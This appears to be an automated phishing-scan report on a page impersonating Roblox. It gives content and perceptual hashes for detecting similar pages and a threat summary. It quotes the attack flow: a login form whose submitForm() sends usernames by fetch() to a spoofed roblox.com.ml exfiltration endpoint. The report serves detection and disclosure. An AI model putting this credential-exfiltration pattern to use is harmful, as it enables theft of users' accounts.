Detailed analysis of captured phishing page
Used to detect similar phishing pages based on HTML content
| Algorithm | Hash Value |
|---|---|
|
CONTENT
TLSH
|
T1AA13B872A1246C33A1AFA3D9F515B70591D3EB0ECB425BE2A1F8A37609C9C71FD1341A |
|
CONTENT
ssdeep
|
768:4SiXB1WayLxjQEf6BbyJMP5rvrvEQ3ykHvBR5MF9NpBxJ8m8:4SiXB1xyLx0Ef6BLjMSrXK9NTxJ8m8 |
Used to detect visually similar phishing pages based on screenshots
| Algorithm | Hash Value |
|---|---|
|
VISUAL
pHash
|
b03031cfcfcc4c67 |
|
VISUAL
aHash
|
c3c7c3dfffffffff |
|
VISUAL
dHash
|
9e1e0e3e1a1a3002 |
|
VISUAL
wHash
|
02c383c3cfc3cfc3 |
|
VISUAL
colorHash
|
07047000040 |
|
VISUAL
cropResistant
|
9e1e0e3e1a1a3002,1c3b192d31b584d0 |
โข Threat: Impersonation phishing
โข Target: Roblox users
โข Method: Domain spoofing and potentially malicious Javascript
โข Exfil: Unknown (potentially credentials or other personal data)
โข Indicators: Mismatched domain, obfuscated Javascript, Roblox logo present
โข Risk: HIGH
The attacker likely aims to steal user credentials. The site may display a fake login form or other form designed to collect sensitive data.
The obfuscated javascript might be used to collect data or redirect the user to a different site after inputting credentials.
User fills <input name='username'> โ submitForm() โ fetch('https://www.roblox.com.ml/api/exfiltrate') โ credentials sent
User fills <input name='username'> โ submitForm() โ fetch('https://www.roblox.com.ml/api/exfiltrate') โ credentials sent
EnvironmentUrls.jssubmitFormsendDataPages with identical visual appearance (based on perceptual hash)
Found 10 other scans for this domain